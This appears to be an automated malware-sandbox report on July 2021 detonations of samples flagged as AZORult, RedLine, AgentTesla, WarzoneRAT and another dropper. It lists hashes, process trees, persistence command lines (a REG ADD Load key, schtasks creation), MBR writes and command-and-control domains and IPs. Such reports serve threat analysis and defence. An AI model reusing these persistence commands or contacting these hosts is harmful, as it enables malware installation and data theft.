C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00676e6f-05a9-4da9-aa0e-696a0ccc9272
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_31e6a2d0-b6b1-4c20-9630-7dcb57a92d29
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f7036a47-7532-488b-9093-c56335a4d915
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2653500a-e16e-4c7d-b00f-2ef58238a6c3
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
memory/1528-169-0x0000000000000000-mapping.dmp
memory/1528-175-0x0000000002390000-0x0000000002392000-memory.dmp
memory/1528-176-0x0000000002394000-0x0000000002396000-memory.dmp
memory/1468-184-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1912-186-0x0000000000000000-mapping.dmp
memory/1592-187-0x0000000000000000-mapping.dmp
memory/1652-188-0x0000000000000000-mapping.dmp
memory/280-189-0x0000000000000000-mapping.dmp
memory/1852-190-0x0000000000000000-mapping.dmp
memory/2000-191-0x0000000000000000-mapping.dmp
memory/1528-192-0x0000000000000000-mapping.dmp
memory/964-193-0x0000000000000000-mapping.dmp
memory/1468-194-0x0000000000000000-mapping.dmp
memory/1912-195-0x0000000000000000-mapping.dmp
memory/1556-196-0x0000000000000000-mapping.dmp
memory/1616-197-0x0000000000000000-mapping.dmp
memory/1852-198-0x0000000000000000-mapping.dmp
memory/952-199-0x0000000000000000-mapping.dmp
memory/1988-200-0x0000000000000000-mapping.dmp
memory/1784-201-0x0000000000000000-mapping.dmp
memory/2028-202-0x0000000000000000-mapping.dmp
memory/1912-203-0x0000000000000000-mapping.dmp
memory/1840-204-0x0000000000000000-mapping.dmp
memory/1144-205-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/2000-208-0x0000000000000000-mapping.dmp
memory/2056-209-0x0000000000000000-mapping.dmp
memory/2092-210-0x0000000000000000-mapping.dmp
memory/2104-211-0x0000000000000000-mapping.dmp
memory/2152-212-0x0000000000000000-mapping.dmp
memory/2164-213-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2216-215-0x0000000000000000-mapping.dmp
memory/2228-216-0x0000000000000000-mapping.dmp
memory/2276-217-0x0000000000000000-mapping.dmp
memory/2288-218-0x0000000000000000-mapping.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2344-221-0x0000000000000000-mapping.dmp
memory/2356-222-0x0000000000000000-mapping.dmp
memory/2428-223-0x0000000000000000-mapping.dmp
memory/2488-224-0x0000000000000000-mapping.dmp
memory/2552-225-0x0000000000000000-mapping.dmp
memory/2564-226-0x0000000000000000-mapping.dmp
memory/2564-232-0x00000000195C0000-0x00000000195C2000-memory.dmp
memory/2564-233-0x00000000195C4000-0x00000000195C6000-memory.dmp
memory/2564-262-0x00000000195CA000-0x00000000195E9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Setup.zip
| MD5 | 36f178576dcb8db35d6f06448b1eb510 |
| SHA1 | 62277c90cc2b1bb81b36571037afe5081b0605d5 |
| SHA256 | 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a |
| SHA512 | 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96 |
memory/2828-264-0x0000000000000000-mapping.dmp
memory/2840-265-0x0000000000000000-mapping.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:31
Platform
debian9-mipsbe
Max time kernel
0s
Max time network
46s
Command Line
Signatures
Processes
./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
[./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 3.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 3.debian.pool.ntp.org | udp |
| N/A | 185.238.130.233:123 | 3.debian.pool.ntp.org | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
123s
Max time network
157s
Command Line
Signatures
Azorult
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1924 set thread context of 908 | N/A | C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
"C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe"
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | cskbtr.atspace.co.uk | udp |
| N/A | 185.176.43.84:80 | cskbtr.atspace.co.uk | tcp |
Files
memory/1924-59-0x0000000000980000-0x0000000000981000-memory.dmp
memory/1924-61-0x0000000076691000-0x0000000076693000-memory.dmp
memory/1924-62-0x0000000004D20000-0x0000000004D21000-memory.dmp
\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | ed797d8dc2c92401985d162e42ffa450 |
| SHA1 | 0f02fc517c7facc4baefde4fe9467fb6488ebabe |
| SHA256 | b746362010a101cb5931bc066f0f4d3fc740c02a68c1f37fc3c8e6c87fd7cb1e |
| SHA512 | e831a6ff987f3ef29982da16afad06938b68eddd43c234ba88d1c96a1b5547f2284baf35cbb3a5bfd75e7f0445d14daa014e0ba00b4db72c67f83f0a314c80c2 |
memory/908-65-0x000000000041A684-mapping.dmp
memory/908-64-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | ed797d8dc2c92401985d162e42ffa450 |
| SHA1 | 0f02fc517c7facc4baefde4fe9467fb6488ebabe |
| SHA256 | b746362010a101cb5931bc066f0f4d3fc740c02a68c1f37fc3c8e6c87fd7cb1e |
| SHA512 | e831a6ff987f3ef29982da16afad06938b68eddd43c234ba88d1c96a1b5547f2284baf35cbb3a5bfd75e7f0445d14daa014e0ba00b4db72c67f83f0a314c80c2 |
memory/908-67-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
150s
Max time network
185s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1976 set thread context of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
"C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe"
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 46.8.19.196:53773 | N/A | tcp |
(the same direct-to-IP TCP connection to 46.8.19.196:53773, with no domain resolved, is recorded 52 times in this detonation)
Files
memory/1976-60-0x0000000000E30000-0x0000000000E31000-memory.dmp
memory/1976-62-0x00000000049A0000-0x00000000049A1000-memory.dmp
memory/1976-63-0x0000000000230000-0x0000000000238000-memory.dmp
memory/1520-64-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1520-65-0x0000000000417E2A-mapping.dmp
memory/1520-66-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1520-68-0x00000000043C0000-0x00000000043C1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
138s
Max time network
127s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\kprUEGC = "C:\\Users\\Admin\\AppData\\Roaming\\kprUEGC\\kprUEGC.exe" | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4448 set thread context of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qqUYUQOSj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp151F.tmp"
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
Network
Files
memory/4448-114-0x0000000000260000-0x0000000000261000-memory.dmp
memory/4448-116-0x0000000005120000-0x0000000005121000-memory.dmp
memory/4448-117-0x0000000004C20000-0x0000000004C21000-memory.dmp
memory/4448-118-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/4448-119-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/4448-120-0x0000000004C00000-0x0000000004C01000-memory.dmp
memory/4448-121-0x00000000050F0000-0x000000000510B000-memory.dmp
memory/4448-122-0x00000000082C0000-0x0000000008340000-memory.dmp
memory/4448-123-0x0000000008340000-0x000000000837C000-memory.dmp
memory/4044-124-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp151F.tmp
| MD5 | a0431904b36f4d37db3b03b5a92428b1 |
| SHA1 | a9e157e9cfdd610dd676298b0a56f7267ae4c243 |
| SHA256 | 5944b85d71fd75b69e030e59646283d0d388abac5d2c632f54210d8942c84f89 |
| SHA512 | 933107ebcd47846c9860967724408003f83fe138024e864f72fb169c0a1291d531541fd9c00a0f6c3f1a48971f6be7a07bc31ae21445dcc914736723fcf0cca7 |
memory/8-126-0x0000000000400000-0x000000000043C000-memory.dmp
memory/8-127-0x000000000043763E-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe.log
| MD5 | 0c2899d7c6746f42d5bbe088c777f94c |
| SHA1 | 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1 |
| SHA256 | 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458 |
| SHA512 | ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078 |
memory/8-133-0x00000000012F0000-0x00000000012F1000-memory.dmp
memory/8-134-0x0000000005730000-0x0000000005731000-memory.dmp
memory/8-135-0x0000000005DF0000-0x0000000005DF1000-memory.dmp
memory/8-138-0x00000000012F1000-0x00000000012F2000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
69s
Max time network
198s
Command Line
Signatures
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1644 set thread context of 1040 | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe |
| PID 796 set thread context of 1132 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
"C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe"
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | dfdgdsasedw.ydns.eu | udp |
| N/A | 203.159.80.165:34566 | dfdgdsasedw.ydns.eu | tcp |
Files
memory/1644-59-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
memory/1644-61-0x00000000766D1000-0x00000000766D3000-memory.dmp
memory/1644-62-0x0000000004D50000-0x0000000004D51000-memory.dmp
memory/1644-63-0x0000000004D55000-0x0000000004D66000-memory.dmp
memory/1644-64-0x0000000000D70000-0x0000000000DBE000-memory.dmp
memory/1644-69-0x0000000005580000-0x00000000055E7000-memory.dmp
memory/1040-71-0x0000000000405E28-mapping.dmp
memory/1040-70-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1040-73-0x0000000000400000-0x000000000055E000-memory.dmp
memory/812-74-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/796-76-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/796-79-0x0000000000A10000-0x0000000000A11000-memory.dmp
memory/1096-81-0x0000000000000000-mapping.dmp
memory/796-82-0x0000000004D40000-0x0000000004D41000-memory.dmp
memory/796-83-0x0000000004D45000-0x0000000004D56000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/1132-92-0x0000000000405E28-mapping.dmp
memory/1132-95-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/1532-97-0x0000000000000000-mapping.dmp
memory/1132-99-0x00000000036F0000-0x00000000037F0000-memory.dmp
memory/1532-98-0x0000000000160000-0x0000000000161000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:34
Platform
win10v20210410
Max time kernel
128s
Max time network
117s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe1.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\Wondershare\NFWCHK.exe | N/A |
Modifies RDP port number used by Windows
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
